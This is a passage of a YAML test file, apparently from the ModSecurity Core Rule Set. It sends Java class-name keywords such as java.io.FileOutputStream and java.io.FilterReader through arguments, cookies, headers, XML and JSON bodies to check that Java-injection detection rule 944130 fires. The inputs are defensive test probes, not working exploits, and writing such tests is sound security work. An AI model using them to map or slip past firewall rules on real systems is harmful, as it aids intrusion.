"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-100 + desc: "Argument name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-101 + desc: "Cookie test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-102 + desc: "Cookie name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FileOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-103 + desc: "Request header test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-104 + desc: "XML attribute value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-105 + desc: "XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-106 + desc: "Nested XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-107 + desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-108 + desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-109 + desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-110 + desc: "Argument test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-111 + desc: "Argument name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-112 + desc: "Cookie test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-113 + desc: "Cookie name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-114 + desc: "Request header test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-115 + desc: "XML attribute value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-116 + desc: "XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-117 + desc: "Nested XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-118 + desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-119 + desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-120 + desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log_contains: "id 
\"944130\"" + - test_title: 944130-121 + desc: "Argument test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-122 + desc: "Argument name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-123 + desc: "Cookie test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-124 + desc: "Cookie name 
includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-125 + desc: "Request header test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-126 + desc: "XML attribute value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-127 + desc: "XML element value includes keyword java.io.FilterOutputStream" + stages: + - 
stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-128 + desc: "Nested XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-129 + desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-130 + desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-131 + desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-132 + desc: "Argument test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-133 + desc: "Argument name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-134 + desc: "Cookie test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-135 + desc: "Cookie name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-136 + desc: "Request header test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-137 + desc: "XML attribute value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-138 + desc: "XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-139 + desc: "Nested XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-140 + desc: "Content-Type text/plain includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-141 + desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-142 + desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-143 + desc: "Argument test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-144 + desc: "Argument name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-145 + desc: "Cookie test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 